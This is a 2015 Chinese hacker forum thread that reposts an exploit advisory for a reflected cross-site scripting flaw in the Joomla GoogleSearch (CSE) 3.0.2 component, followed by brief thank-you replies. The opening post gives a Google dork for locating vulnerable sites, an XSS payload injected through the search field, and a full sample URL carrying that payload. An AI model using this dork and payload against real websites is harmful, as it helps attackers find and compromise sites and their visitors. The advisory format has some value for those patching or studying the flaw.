90_ 发表于 2015-9-2 12:04:23

Joomla GoogleSearch (CSE) 3.0.2 XSS漏洞

本帖最后由 90_ 于 2015-9-2 12:08 编辑

##############################################
#Exploit title: Joomla Component GoogleSearch (CSE) 3.0.2 - XSS Vulnerability
#Author: Bet0
#Google Dork: inurl:"index.php?option=com_googlesearch_cse"
#Date: 29 Agustus 2015
#Plugins Link: http://extensions.joomla.org/extensions/7023/details
#Tested on: Mozila Firefox 40.0 and Ubuntu 15.04
##############################################

[+]Piye om Carane (PoC)

Go to Columns Search Input The malicious code "><img src=x onerror=prompt(1)>

[+]Sample
http://ihonker.org/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q="><img src=x onerror=prompt(1)>&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.08sec.com

H.U.C-麦麦 发表于 2015-9-3 02:48:24

支持中国红客联盟(ihonker.org)

arctic 发表于 2015-9-3 04:24:05

感谢楼主的分享~

admin1964 发表于 2015-9-3 18:41:57

感谢楼主的分享~

wtsqq123 发表于 2015-9-3 22:46:59

学习学习技术,加油!

r00tc4 发表于 2015-9-4 19:13:46

学习学习技术,加油!

ljy07 发表于 2015-9-5 00:56:05

学习学习技术,加油!

Micah 发表于 2015-9-5 04:08:47

还是不错的哦,顶了

Sty,涛 发表于 2015-9-5 09:25:54

支持中国红客联盟(ihonker.org)

CHRIS 发表于 2015-9-6 00:02:50

页: [1] 2 3 4 5
查看完整版本: Joomla GoogleSearch (CSE) 3.0.2 XSS漏洞